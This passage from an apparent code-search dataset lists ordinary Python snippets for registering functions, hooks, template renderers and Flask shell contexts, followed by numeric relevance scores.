render(self, context):\n return renderer(context, token)\n return TagNode()\n for copy_attr in (\"__dict__\", \"__doc__\", \"__name__\"):\n setattr(tag, copy_attr, getattr(renderer, copy_attr))\n return register.tag(tag)", "def register_function(self, function, name=None):\n if name is None:\n name = function.__name__\n self.funcs[name] = function", "def push_context(self, ctx):\n self._tpl_context = ctx", "def dajaxice_register(*dargs, **dkwargs):\r\n\r\n if len(dargs) and not dkwargs:\r\n function = dargs[0]\r\n dajaxice_functions.register(function)\r\n return function\r\n\r\n def decorator(function):\r\n @functools.wraps(function)\r\n def wrapper(request, *args, **kwargs):\r\n return function(request, *args, **kwargs)\r\n dajaxice_functions.register(function, *dargs, **dkwargs)\r\n return wrapper\r\n return decorator", "def preprocessor(f):\n f._is_preprocessor = True\n return staticmethod(f)", "def register_step(step_function: StepFunction) -> None:\n global _step_function\n _step_function = step_function", "def add_func(self, transmute_func, transmute_context):\n swagger_path = transmute_func.get_swagger_path(transmute_context)\n for p in transmute_func.paths:\n self.add_path(p, swagger_path)", "def register_callback(self, priority, f, with_request, render=None):\n if self.component is not None:\n return self.component.register_callback(self.model or None, priority, f, with_request, render)\n\n return ''", "def register(name, fn=None):\n def _hook_add(func):\n if name not in _hooks:\n logger.debug(\"Creating new hook %s\" % name)\n _hooks[name] = []\n\n logger.debug('Registering hook %s for function %s' % (name, fn))\n _hooks[name].append(func)\n\n if fn is None:\n # Behave like a decorator\n def decorator(func):\n _hook_add(func)\n return func\n return decorator\n else:\n # Behave like a function, just register hook\n _hook_add(fn)", "def inst_set_cpu_template_ext_fxt(request):\n return request.param", "def uses_template(template):\n def wrapper(func):\n @functools.wraps(func)\n def wrapped(*args, **kwargs):\n template_path = template\n ctx = func(*args, **kwargs)\n if type(ctx) is dict:\n try:\n return render_template(template_path,\n inators=ctx['inators'])\n except KeyError:\n try:\n return render_template(template_path,\n inator=ctx['inator'])\n except KeyError:\n return render_template(template_path, inators=ctx)\n else:\n return ctx\n return wrapped\n return wrapper", "def register(dmm, typecls):\n def wraps(fn):\n dmm.register(typecls, fn)\n return fn\n\n return wraps", "def register_function_compilation(self, func, compilation_cbk, listclass):\n self.compilations_function[func] = {\n 'callback': compilation_cbk,\n 'listclass': listclass\n }", "def macro(self, func):\r\n self.register_macro(func.__name__)\r\n\r\n def wrapper(*args, **kwargs):\r\n old = func.__globals__.copy()\r\n for key in self.current_context.keys():\r\n del func.__globals__[key]\r\n\r\n if not self.loaded:\r\n self.add_macro_context(func.__name__)\r\n self.switch_context(self.macros[func.__name__].get_last_instance())\r\n self.parse_labels(getsource(func))\r\n\r\n else:\r\n self.switch_context(self.macros[func.__name__].get_next_instance())\r\n\r\n func.__globals__.update(self.current_context)\r\n func(*args, **kwargs)\r\n func.__globals__.clear()\r\n func.__globals__.update(old)\r\n\r\n self.restore_context()\r\n\r\n wrapper.original = func.original if hasattr(func, 'original') else func\r\n return wrapper", "def register_shellcontext(app):\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n 
return {\n \"db\": db,\n \"User\": account.models.User,\n \"Product\": product.models.Product,\n \"Order\": order.models.Order,\n }\n\n app.shell_context_processor(shell_context)", "def register_shell_context(app):\n from .extensions import db\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n return {'db': db, }\n\n app.shell_context_processor(shell_context)", "def register(self, *args):\n def decorate(f):\n if not len(args) == 1:\n full = f.__name__\n else:\n full = args[0]\n\n # Gather some informations about the arguments of the function, to\n # display them in help() and check for the min / max number of\n # arguments on call.\n spec = inspect.getargspec(f)\n fargs = spec.args if spec.args else []\n nbr_args = len(fargs)\n nbr_filled = len(spec.defaults) if spec.defaults else 0\n reqs = fargs[:nbr_args-nbr_filled+1]\n adds = fargs[nbr_args-nbr_filled+1:]\n\n info = {\n 'function' : f,\n 'required' : reqs,\n 'additional': adds,\n }\n\n self.actions[full] = info\n return f\n return decorate", "def _add_template(self, alias, template):\n # Construct a function that will do substitution for any placeholders\n # in the template.\n def fname(**kwargs):\n return _substitute(template, self.files(), kwargs)\n\n # Bind the fname function to this instance of FileNames\n self.__dict__[alias] = fname", "def register_shellcontext(app):\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n return {\"db\": db, \"User\": user.models.User, \"AnalysisRequest\": engine.models.AnalysisRequest}\n\n app.shell_context_processor(shell_context)", "def registerSLPlugin(self, tag, handler_fn):\n self.sl_plugins[tag] = handler_fn", "def registerMLPlugin(self, tag, handler_fn):\n self.ml_plugins[tag] = handler_fn", "def callback( context ):\n return '<tag>{}</tag>'.format( function( context ) )", "def pre_processor(self):", "def make_processing_functions(self):\n return", "def make_command_register(collector):\n\n def _register(*args, name=None):\n a_transform = _transform(*args)\n return collector.register(transform=a_transform, name=name)\n\n return _register", "def register(name, templating=True):\n if name in _plugins:\n return\n import template\n _plugins.append(name)\n\n if templating:\n path = os.path.normpath(os.path.join(\n os.path.dirname(monkey.__file__),\n '../plugins/%s/templates' % name))\n template.add_template_path(path)\n template.add_template_path(path, prefix=name)", "def register_function(self, *args):\n if len(args) == 1:\n function = args[0]\n try:\n name = function.fact_name\n except AttributeError:\n name = function.__name__\n if name is None:\n raise Exception(\"Function does not have a name\")\n else:\n name, function = args\n self.functions[name] = function", "def render_index(request, *args, **kwargs):\n # add context_instance keyword\n kwargs.update(\n {'context_instance': RequestContext(request, processors=[custom_proc])})\n\n return render(request, *args, **kwargs)", "def register_template(self, name, template):\n key = name, len(template.args)\n existing = self.templates.get(key)\n if existing:\n raise mio.MIOException('The template \"%s/%d\" is already registered' % (name, len(template.args)))\n self.templates[key] = template", "def add_renderer_globals(event):\n def fake_url(controller=None, action=None, **kwargs):\n if action == \"css\":\n return \"/css\"\n if action and controller:\n path = {}\n for key in 'name', 'pocket', 'subpath':\n if key in kwargs:\n path[key] = kwargs.pop(key)\n path['_query'] = dict((k,v) for k,v in kwargs.items() if v is not 
None)\n return request.route_path(controller+\"/\"+action, **path)\n if controller and controller.startswith(\"/\"):\n return controller\n return \"/unknown\"\n\n def fake_url_current(**kwargs):\n path = {}\n # XXX request.matchdict?\n if 'name' in kwargs:\n path['name'] = kwargs.pop('name')\n if 'action' in kwargs:\n path['_route_name'] = 'dex/'+kwargs.pop('action')\n path['_query'] = dict((k,v) for k,v in kwargs.items() if v is not None)\n return request.current_route_path(**path)\n\n def fake_translate(message, plural=None, n=None, context=None, comment=None):\n return unicode(message)\n\n renderer_globals = event\n request = event.get(\"request\") #or threadlocal.get_current_request()\n if not request:\n return\n config = request.registry.settings\n renderer_globals[\"config\"] = config\n renderer_globals[\"h\"] = splinehelpers\n renderer_globals[\"r\"] = request\n renderer_globals[\"c\"] = request.tmpl_context\n #renderer_globals[\"url\"] = request.url_generator\n renderer_globals[\"url\"] = fake_url\n fake_url.current = fake_url_current\n renderer_globals[\"_\"] = fake_translate\n renderer_globals[\"flash\"] = lib.Flash(request.session)\n\n request.tmpl_context.links = config['spline.plugins.links']\n\n # start timer\n request.tmpl_context.timer = lib.ResponseTimer()", "def _instantiate_attributes_before_function(self, context=None):\n self._instantiate_pathway(context=context)\n # super(Process_Base, self)._instantiate_function(context=context)", "def add_function(self, function):\n self.functions.append(function)", "def add_function(self, function):\n self.functions.append(function)", "def render(self, source: str, context: dict):\n\n # Creating new class which will be used as a template context.\n context_class = type('RenderContext', (Context,), {})\n\n # All callable objects in context.\n helpers = {}\n\n for key, value in context.items():\n\n # Install each callable object as a context class property.\n if callable(value):\n setattr(context_class, 'helper_' + key, Helper(value))\n helpers[key] = value\n\n # Helper function is run only when context dict has it name as a key.\n # Use template context class to create dict.\n render_context = context_class(context)\n\n result = pystache.render(source, render_context)\n\n return result", "def register(self, filter_name, filter_func):\n self._filters[filter_name] = filter_func", "def add_function (self, module, name) :\n setattr (module, name, self._wrapped (module, name))", "def register_shell_context(app):\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n return {\"db\": db, \"User\": User}\n\n app.shell_context_processor(shell_context)", "def register(self, format, serfunc):\n if not isinstance(serfunc, func):\n raise TypeError(\"Serializer.register(): serfunc is not a function: \"+\n str(func))\n self._map[format] = serfunc", "def register(self, *types, **kwargs):\n\n def _(func):\n trace_func = trace(func)\n TwoLevelDispatcher.register(self, *types, **kwargs)(trace_func)\n # return func instead trace_func here so that\n # chained register didn't get wrapped multiple\n # times\n return func\n\n return _", "def get_template_context_processors(exclude=(), append=(),\n current={'processors': TEMPLATE_CONTEXT_PROCESSORS}):\n\n current['processors'] = tuple(\n [p for p in current['processors'] if p not in exclude]\n ) + tuple(append)\n\n return current['processors']", "def templated(template=None):\n def decorator(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n # Run the view\n ctx = f(*args, **kwargs)\n # 
Create a context if needed\n if ctx is None:\n ctx = {}\n # Or return exotic value. A redirect for example\n elif not isinstance(ctx, dict):\n return ctx\n # Compute the template name if needed\n template_name = template\n if template_name is None:\n template_name = request.endpoint.replace('.', '/') + '.html'\n # Render\n return render_template(template_name, **ctx)\n return decorated_function\n return decorator", "def register_shell_context(app):\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n return {\n 'db': db,\n 'User': user.models.User,\n 'UserProfile': profile.models.UserProfile,\n }\n\n app.shell_context_processor(shell_context)", "def test_register_template(self):\n pass", "def register_shellcontext(app):\n\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n return {\n 'db': db,\n 'User': user.models.User}\n\n app.shell_context_processor(shell_context)", "def register(f):\n\tshapes[f.__name__] = f\n\treturn f", "def register(app, fn):\n\n @functools.wraps(fn)\n def config_route(**kwargs):\n \"\"\"\n :param kwargs: str, id of existing entry\n :return: dict or exception\n \"\"\"\n\n return fn(app.config, **kwargs)\n\n app.route(*fn.route_args, **fn.route_kwargs)(config_route)", "def register_shellcontext(app):\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n return {\n 'session': db.session,\n }\n\n app.shell_context_processor(shell_context)", "def register_shellcontext(app):\n def shell_context():\n \"\"\"Shell context objects.\"\"\"\n from dribdat.user.models import User\n return {\n 'db': db,\n 'User': User}\n\n app.shell_context_processor(shell_context)", "def add_renderer_globals(event):\n request = event.get('request')\n if request is None:\n request = get_current_request()\n globs = {\n 'url': route_url,\n 'h': None,\n 'a_url': request.application_url,\n 'user': authenticated_userid(request),\n 'repo': Repo(request.registry.settings.get('git_repo', '.'))\n }\n if request is not None:\n tmpl_context = request.tmpl_context\n globs['c'] = tmpl_context\n globs['tmpl_context'] = tmpl_context\n try:\n globs['session'] = request.session\n except ConfigurationError:\n pass\n event.update(globs)", "def register(name, func):\n WebSocketRouter.funcmap[name] = func", "def render_in_context(context, template, local_context=None):\n\n if context is None:\n context = Context()\n\n if not hasattr(template, \"render\"): # Quacks like a template?\n try:\n engine = context.template.engine\n except AttributeError:\n engine = Engine.get_default()\n\n if isinstance(template, (list, tuple)):\n template = engine.select_template(template)\n else:\n template = engine.get_template(template)\n\n with context.push(local_context):\n return template.render(context)", "def register(name, inputhook):\n registered[name] = inputhook", "def register(self, function, name=None, method='POST'):\r\n\r\n method = self.clean_method(method)\r\n\r\n # Generate a default name\r\n if not name:\r\n module = ''.join(str(function.__module__).rsplit('.ajax', 1))\r\n name = '.'.join((module, function.__name__))\r\n\r\n if ':' in name:\r\n log.error('Ivalid function name %s.' % name)\r\n return\r\n\r\n # Check for already registered functions\r\n if name in self._registry:\r\n log.error('%s was already registered.' 
% name)\r\n return\r\n\r\n # Create the dajaxice function.\r\n function = DajaxiceFunction(function=function,\r\n name=name,\r\n method=method)\r\n\r\n # Register this new ajax function\r\n self._registry[name] = function", "def register(operation_key, *param_keys):\n\n def decorator(operation_fn):\n _operations[operation_key] = Operation(operation_fn, param_keys)\n return operation_fn\n\n return decorator", "def register_topi_compute(task_name, func=None):\n\n def _decorate(topi_compute):\n @functools.wraps(topi_compute)\n @_register_task_compute(task_name)\n def wrapper(*args, **kwargs):\n \"\"\"wrapper function for topi compute\"\"\"\n assert not kwargs, \"Do not support kwargs in template function call\"\n task_env = TaskExtractEnv.current\n if task_env is not None and task_env.tracing:\n task_env.add_task(task_name, args)\n workload = args_to_workload(args, task_name)\n tgt = Target.current()\n cfg = DispatchContext.current.query(tgt, workload)\n node = topi_compute(cfg, *args)\n\n # attach workload to return op\n op = node.op\n attrs = {}\n for k, v in node.op.attrs.items():\n attrs[k] = v\n attrs[\"workload\"] = workload\n if isinstance(op, tensor.ComputeOp):\n op = tvm.te._ffi_api.ComputeOp(op.name, op.tag, attrs, op.axis, op.body)\n elif isinstance(op, tensor.ExternOp):\n op = tvm.te._ffi_api.ExternOp(\n op.name,\n op.tag,\n attrs,\n op.inputs,\n op.input_placeholders,\n op.output_placeholders,\n op.body,\n )\n else:\n raise RuntimeError(\"Unsupported op type: \" + str(type(op)))\n\n if isinstance(node, tensor.Tensor):\n return op.output(0)\n return [op.output(i) for i in range(len(node))]\n\n return wrapper\n\n if func:\n return _decorate(func)\n return _decorate", "def Register(self, name, fn):\n name = normalizeStr(name)\n Logger.Debug(\"Registering Formatter:\", name)\n self._formatters[name] = fn", "def add_renderer_globals(event):\r\n request = event['request']\r\n event['_'] = request.translate\r\n event['ungettext'] = request.ungettext\r\n event['localizer'] = request.localizer", "def register(self, funcs):\n for name, func in funcs.items():\n self.functions[name] = func", "def addGlobalFunction(self,function:TFunction):\n self.globalFunctions.put(function.name,function)", "def threaded_callback(self, func):\n\n self.th_func_map[func.__name__] = func", "def _context(name, func):\n\tpush_aspect(name, func)\n\tyield\n\tpop_aspect(name)", "def register(obj_name, obj):\n if obj_name not in ninja_globals['register']:\n ninja_globals['register'][obj_name] = obj", "def register(self, param):\n\n def decorator(key, value):\n self[key] = value\n return value\n\n if callable(param):\n return decorator(None, param)\n return lambda x: decorator(param, x)", "def register_compat_handler(self, func, version):\n tf_op.register_handler(func, version, self.names, self.domain, self.kwargs)", "def register_code(args, namespace, notifier=None):\n\n if args.type == 'passthrough':\n user_code = None\n else:\n filename = args.code.filename\n args.code = args.code.stream.read()\n tempdir = tempfile.mkdtemp()\n user_code = extract(filename, args.code, tempdir)\n return register(Service, args, namespace, user_code, notifier)", "def basic_wrapper( function ):\n\n #=========================================================================\n def callback( context ):\n \"\"\"\n The callback function with a single call-time context argument.\n \"\"\"\n return '<tag>{}</tag>'.format( function( context ) )\n return callback", "def template_function(self, node, ordered_functions):\n oldoptions = 
node.options\n headers_typedef = collections.OrderedDict()\n\n # targs - ast.TemplateArgument\n for iargs, targs in enumerate(node.template_arguments):\n new = node.clone()\n ordered_functions.append(new)\n self.append_function_index(new)\n\n new._generated = \"cxx_template\"\n\n fmt = new.fmtdict\n if targs.fmtdict:\n fmt.update(targs.fmtdict)\n\n # Use explicit template_suffix if provide.\n # If single template argument, use type's explicit_suffix\n # or the unqualified flat_name.\n # Multiple template arguments, use sequence number.\n if fmt.template_suffix:\n pass\n elif len(targs.asts) == 1:\n ntypemap = targs.asts[0].typemap\n if ntypemap.template_suffix:\n fmt.template_suffix = ntypemap.template_suffix\n else:\n fmt.template_suffix = \"_\" + ntypemap.flat_name\n else:\n fmt.template_suffix = \"_\" + str(iargs)\n\n new.cxx_template = {}\n fmt.CXX_template = targs.instantiation # ex. <int>\n\n # Gather headers required by template arguments.\n for targ in targs.asts:\n ntypemap = targ.typemap\n headers_typedef[ntypemap.name] = ntypemap\n\n self.push_instantiate_scope(new, targs)\n\n if new.ast.template_argument:\n iast = getattr(self.instantiate_scope, new.ast.template_argument)\n new.ast = new.ast.instantiate(node.ast.instantiate(iast))\n # Generics cannot differentiate on return type\n new.options.F_create_generic = False\n\n # Replace templated arguments.\n # arg - declast.Declaration\n newparams = []\n for arg in new.ast.declarator.params:\n if arg.template_argument:\n iast = getattr(self.instantiate_scope, arg.template_argument)\n newparams.append(arg.instantiate(iast))\n else:\n newparams.append(arg)\n new.ast.declarator.params = newparams\n self.pop_instantiate_scope()\n\n new.gen_headers_typedef = headers_typedef\n # Do not process templated node, instead process\n # generated functions above.\n node.wrap.clear()", "def test_register_context_error(self):\n @self.skill.register('test_logic')\n def sample_func():\n \"\"\"Decorated function.\"\"\"\n pass\n self.skill.logic['test_logic']()\n self.assertRaises(RuntimeError, sample_func)", "def run(context: components.Components):\n\n def decorator(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n def _child_context():\n buvar_context.set(context)\n return func(*args, **kwargs)\n\n ctx = contextvars.copy_context()\n return ctx.run(_child_context)\n\n return wrapper\n\n return decorator", "def includeme(config):\n config.add_subscriber(add_renderer_globals, BeforeRender)\n config.add_subscriber(add_localizer, NewRequest)\n config.add_subscriber(add_csrf_validation, NewRequest)\n config.add_subscriber(add_resources, NewRequest)", "def register(name):\n def func(cls):\n \"\"\"\n See register\n \"\"\"\n REGISTRY[name] = cls()\n return cls\n return func", "def preprocess_func(cls, func):\n return func", "def __call__(self, path):\n def wrapper(application):\n self.register(path, application)\n return application\n return wrapper", "def add(self, context):\n self._contexts.add(context)", "def register_inlinequery_handler(self, function_):\n assert decorators.has_inlinequery(function_)\n for query in getattr(function_, '_TELEGRAM_inlinequery'):\n self._inlinequery_reg[query] = function_" ]
[ "0.56674093", "0.56304383", "0.5513914", "0.5493239", "0.5407706", "0.5372997", "0.52977866", "0.52085143", "0.5204628", "0.51973486", "0.5171223", "0.51613235", "0.51562536", "0.51132387", "0.5089765", "0.50798845", "0.5026726", "0.499174", "0.4989556", "0.49833864", "0.49706504", "0.49704543", "0.4954364", "0.49457413", "0.49374548", "0.493102", "0.49267408", "0.49232724", "0.4909595", "0.49087003", "0.4899992", "0.48758927", "0.4853122", "0.4852713", "0.48363546", "0.48072746", "0.4802387", "0.47976443", "0.47864455", "0.47485548", "0.47469166", "0.47428554", "0.4739203", "0.4725738", "0.4723522", "0.47226787", "0.470985", "0.47021407", "0.46966815", "0.46948013", "0.46929786", "0.46925268", "0.46887207", "0.46875125", "0.4666406", "0.46627232", "0.46627086", "0.46627086", "0.46619922", "0.46615422", "0.46537733", "0.46535292", "0.46521255", "0.46454808", "0.46364346", "0.46357763", "0.46314222", "0.46179023", "0.46149054", "0.46094424", "0.46090034", "0.4607908", "0.46033219", "0.45977312", "0.4595452", "0.45939237", "0.45881987", "0.45829782", "0.45825672", "0.4582372", "0.4575122", "0.4573272", "0.45641288", "0.45639896", "0.45587584", "0.45527768", "0.4549209", "0.45458502", "0.45425966", "0.45408285", "0.4536185", "0.4532845", "0.4522489", "0.4522315", "0.45093834", "0.45059133", "0.4502844", "0.44999266", "0.44942328", "0.44929507" ]
0.75228786
0
Enroll a new profile to Azure Speaker ID.
def enroll_profile(region, subscription_key, wav_path):
        fs, audio_data = _check_and_load_wav_file_length(wav_path)
        profile_id = _add_profile(region, subscription_key)
        url = "%s/speaker/identification/v2.0/text-independent/profiles/%s/enrollments" % (
            _get_azure_endpoint(region), profile_id)
        headers = {
            "Ocp-apim-subscription-key": subscription_key,
            "Content-Type": "audio/wav; codecs=audio/pcm; samplerate=%s" % fs,
        }
        session = requests.Session()
        resp = session.post(url, headers=headers, data=audio_data)
        print("Enrollment response status code: %s\n" % resp.status_code)
        print(json.dumps(json.loads(resp.content), indent=2))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def put(self, id):\n adm = Administration()\n print(api.payload)\n lp = LearnProfile.from_dict(api.payload)\n if lp is not None:\n lp.set_id(id)\n adm.save_learnprofile(lp)\n return lp, 200\n\n else:\n return '', 500", "def perform_create(self, serializer):\r\n serializer.save(user_type=\"SPEAKER\")", "def perform_create(self, serializer):\n profile = models.Profile.objects.get(pk=self.kwargs.get(\"pk\"))\n\n return serializer.save(profile=profile)", "def create_user_profile(sender, instance, created, **kwargs):\n if created:\n # create new Stellar account\n stellar.api.create_account(user=instance)", "def createProfile(self):\n if self.profile:\n return\n from soc.modules.gsoc.models.profile import GSoCProfile\n user = self.createUser()\n properties = {'link_id': user.link_id, 'student_info': None, 'user': user,\n 'parent': user, 'scope': self.program, 'status': 'active'}\n self.profile = seeder_logic.seed(GSoCProfile, properties)", "def perform_create(self, serializer):\n topic = models.ProfileTopic.objects.get(pk=self.kwargs.get(\"pk\"))\n\n return serializer.save(topic=topic)", "def set_speaker(self, identifier):\n self.up_to_date = False\n self._speaker = identifier", "def add_profile(self, profile):\r\n self.profiles.append(profile)", "def save_profile(sender, instance, **kwargs):\n instance.profile.save()", "def update_profile(id):\n tags = request.form.get('tags')\n user = User.query.get(id)\n speaker = Speaker.query.filter_by(id_assigned_user=user.id).first()\n\n speaker.tags = tags\n try:\n db.session.commit()\n except:\n abort(500)\n\n return redirect(url_for('get_profile', id=user.id))", "def perform_create(self, serializer):\n serializer.save(user_profile=self.request.user)", "def perform_create(self, serializer):\n serializer.save(user_profile=self.request.user)", "def perform_create(self, serializer):\n serializer.save(user_profile=self.request.user)", "def perform_create(self, serializer):\n serializer.save(user_profile=self.request.user)", "def perform_create(self, serializer):\n serializer.save(user_profile=self.request.user)", "def perform_create(self, serializer):\n serializer.save(user_profile=self.request.user)", "def new_profile(email):\n key = challenge_12.deterministic_random_key()\n profile = bytes(profile_for(email.decode()), 'ascii')\n\n return challenge_11.AES_ECB(key).encrypt(profile)", "def enable(self,\n profile_id=None):\n if profile_id is None:\n self._enabled = True\n else:\n self._profiles[profile_id] = True", "def perform_create(self, serializer):\n serializer.save(user_profile = self.request.user)", "def save_profile(self):\n self.save()", "def put(self, id ):\n adm = Administration()\n print(api.payload)\n p = Profile.from_dict(api.payload)\n if p is not None:\n p.set_id(id)\n adm.save_profile(p)\n return p, 200\n else:\n return '', 500", "def create(self, validated_data):\n return Speaker.objects.create(**validated_data)", "def enrol(self, enrol_data):\n self.busy_wait(enrol_cost)\n return {'speaker': enrol_data['speaker'], 'room': enrol_data['room']}", "def perform_create(self, serializer): # this method runs everytime a POST method is called\n serializer.save(user_profile=self.request.user)", "def switch_profile(self, params):\n profile_id = params.get('profile_id', [''])[0]\n switch_profile = self.netflix_session.switch_profile(\n profile_id=profile_id,\n account=self.credentials)\n return switch_profile", "def test_update_profile(self):\n self.cim.update_profile(\n customer_id=u\"222\",\n description=u\"Foo bar baz quz\",\n 
email=u\"dialtone@gmail.com\",\n customer_profile_id=u\"122\"\n )", "def perform_create(self,serializer):\n serializer.save(user_profile=self.request.user)", "def perform_create(self,serializer):\n serializer.save(user_profile=self.request.user)", "def createStudent(self):\n self.createProfile()\n from soc.modules.gsoc.models.profile import GSoCStudentInfo\n properties = {'key_name': self.profile.key().name(), 'parent': self.profile}\n self.profile.student_info = seeder_logic.seed(GSoCStudentInfo, properties)\n self.profile.put()", "async def on_speaking(self, speaking, uid):\n pass", "def create(profile, name):\n client = boto3client.get(\"iam\", profile)\n params = {}\n params[\"InstanceProfileName\"] = name\n return client.create_instance_profile(**params)", "async def test_create(self):\n expected = {\n 'id': 'id'\n }\n profile = {\n 'name': 'name',\n 'version': 4,\n }\n rsps = respx.post(f'{PROVISIONING_API_URL}/users/current/provisioning-profiles') \\\n .mock(return_value=Response(200, json=expected))\n id = await provisioning_client.create_provisioning_profile(profile)\n assert rsps.calls[0].request.url == f'{PROVISIONING_API_URL}/users/current/provisioning-profiles'\n assert rsps.calls[0].request.headers['auth-token'] == 'header.payload.sign'\n assert rsps.calls[0].request.content == json.dumps(profile).encode('utf-8')\n assert id == expected", "def create_profile(sender, instance, signal, created, **kwargs):\n \n from phylocommons.models import UserProfile\n \n if created:\n UserProfile(user = instance).save()", "def save_user_profile(sender, instance, **kwargs):\n instance.profile.save()", "def save_user_profile(sender, instance, **kwargs):\n instance.profile.save()", "def add_speaker(self, name, audio_sample):\n if name in self.speakers:\n print(\"Error: %s is already a speaker\" % name)\n return\n \n self.speakers.append(name)\n\n features_left, features_right = self.extract_features(audio_sample)\n\n if self.both_channels:\n self.save_data(name, (features_left, features_right))\n else:\n self.save_data(name, (features_left))\n\n self.train_model()", "def putProfile(profileType,value):\n # PUT /profile/$profileType\n pass", "def perform_create(self, serializer):\n print(self.request.user)\n serializer.save(user_profile=self.request.user)", "def test_upsert_profile(mocker, mock_es_profile_serializer, user):\n patched_task = mocker.patch(\"search.search_index_helpers.tasks.upsert_profile\")\n upsert_profile(user.profile.id)\n patched_task.assert_called_once_with(user.profile.id)", "def create_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)", "def handle_simplerenroll(self):\n self.handle_simpleenroll()", "def save(self, *args, **kwargs):\r\n\r\n if not self.trackerid:\r\n self.trackerid = generate_trackerid()\r\n super(Profile, self).save(*args, **kwargs)", "def save(self, *args, **kwargs):\n\n if not self.trackerid:\n self.trackerid = generate_trackerid()\n super(Profile, self).save(*args, **kwargs)", "def test_second_speaker_profile_page(self):\n second_speaker = Speaker.objects.create(name=\"Nancy Pelosi\")\n self.first_presentation.additional_speakers.add(second_speaker)\n\n response = self.client.get(\n reverse(\n \"speaker_profile\",\n args=[second_speaker.pk, second_speaker.slug],\n )\n )\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, FIRST_PRESENTATION_TITLE)\n self.assertNotContains(response, SECOND_PRESENTATION_TITLE)", "def create_profile(sender, **kw):\n user = kw['instance']\n if 
kw['created']:\n profile = UserProfile(user=user)\n profile.save()", "def set_profile(self, profile: str):\n self._profile = profile", "def create_profile(sender, instance, signal, created, **kwargs):\n \n from tutablr_app.models import UserProfile\n \n if created:\n UserProfile.objects.get_or_create(user = instance);\n # Do additional stuff here if needed, e.g.\n # create other required related records", "def add_speaker(self, identifier, score):\n val = float(score)\n if not identifier in self.speakers:\n self.speakers[identifier] = val\n else:\n if self.speakers[identifier] < val:\n self.speakers[identifier] = val", "def _1_profile(self, _1_profile):\n\n self.__1_profile = _1_profile", "def new_sddc_ipsec_vpn_ike_profile(**kwargs):\n proxy = kwargs['proxy']\n session_token = kwargs['sessiontoken']\n display_name = kwargs['display_name']\n ike_ver = kwargs['ike_version']\n dh_group = kwargs['dh_group']\n digest_algo = kwargs['digest_algo']\n encrypt_algo = kwargs['encrypt_algo']\n\n # Check for incompatible IKE profile options\n if 'AES_GCM_256' in encrypt_algo and ike_ver != 'IKE_V2':\n sys.exit(f'AES GCM encryption algorithms require IKE V2')\n elif 'AES_GCM_192' in encrypt_algo and ike_ver != 'IKE_V2':\n sys.exit(f'AES GCM encryption algorithms require IKE V2')\n elif 'AES_GCM_128' in encrypt_algo and ike_ver != 'IKE_V2':\n sys.exit(f'AES GCM encryption algorithms require IKE V2')\n elif 'AES_GCM_256' in encrypt_algo and digest_algo:\n sys.exit(f'AES GCM encryption algorithm cannot be configured with a digest algorithm')\n elif 'AES_GCM_192' in encrypt_algo and digest_algo:\n sys.exit(f'AES GCM encryption algorithm cannot be configured with a digest algorithm')\n elif 'AES_GCM_128' in encrypt_algo and digest_algo:\n sys.exit(f'AES GCM encryption algorithm cannot be configured with a digest algorithm')\n else:\n pass\n\n # Build JSON data\n json_data = {\n \"resource_type\": \"IPSecVpnIkeProfile\",\n \"display_name\": display_name,\n \"id\": display_name,\n \"encryption_algorithms\": encrypt_algo,\n \"digest_algorithms\": digest_algo,\n \"dh_groups\": dh_group,\n \"ike_version\": ike_ver\n }\n json_response_status_code = new_ipsec_vpn_ike_profile_json(proxy, session_token, display_name, json_data)\n if json_response_status_code == 200:\n sys.exit(f'IKE Profile {display_name} was created successfully')\n else:\n print('There was an error')\n sys.exit(1)", "def perform_create(self, serializer):\n if serializer.instance is None:\n profile = Profile.objects.get(user=self.request.user)\n #print profile\n serializer.save(owner=profile)", "def create_pootle_profile(sender, instance, **kwargs):\n try:\n profile = instance.get_profile()\n except PootleProfile.DoesNotExist:\n profile = PootleProfile(user=instance)\n profile.save()", "def create_profile(sender, **kwargs):\n user = kwargs[\"instance\"]\n if kwargs[\"created\"]:\n user_profile = Profile(user=user)\n user_profile.save()", "def handle_speak(event):\n context = {'client_name': 'mycroft_listener',\n 'source': 'audio',\n 'destination': [\"skills\"]}\n bus.emit(Message('speak', event, context))", "def manage_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)\n else:\n instance.profile.save()", "def create_profile(sender, instance, created, **kwargs):\n if created: \n profile, new = UserProfile.objects.get_or_create(user=instance)", "def create_profile(sender, instance, created, **kwargs):\n if created:\n profile, created = UserProfile.objects.get_or_create(user=instance)", "def 
profile_name(self, profile_name):\n\n self._profile_name = profile_name", "def profile_name(self, profile_name):\n\n self._profile_name = profile_name", "def saveOkcupidProfile(self, username, profile_source):\n\t\tdata = lzma.compress(profile_source.encode())\n\t\tencoded = base64.b64encode(data).decode('utf-8')\n\t\tuser = self.getOkcupidUser(username)\n\t\tif not user:\n\t\t\tself.logger.info(\"Storing user profile: %s\", username)\n\t\t\tuser = Models.Okcupid(username)\n\t\t\tuser.source = encoded\n\t\t\tself.session.add(user)\n\t\t\tself.session.commit()\n\t\telse:\n\t\t\tself.logger.info(\"Updating user profile: %s\", username)\n\t\t\tuser.source = encoded\n\t\t\tself.session.commit()", "def create_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)", "def create_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)", "def create_user_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)", "def save_user_profile(instance, **_):\n instance.profile.save()", "def register(self,\n profile_id=None,\n enabled=False):\n\n if profile_id is not None:\n # Check whether profile has already been registered.\n if profile_id not in self._profiles:\n # Register profile (disabled by default)\n self._profiles[profile_id] = enabled", "def ssl_profile_id(self, ssl_profile_id):\n\n self._ssl_profile_id = ssl_profile_id", "def add_skills_to_profile():\n # get specific objects\n profile = storage.get(\"Profile\", profile_id)\n skills = storage.get(\"Skills\", skills_id)\n if profile is not None and skills is not None:\n # check every skill in profile\n for profile_skill in profile.skills:\n # if the given 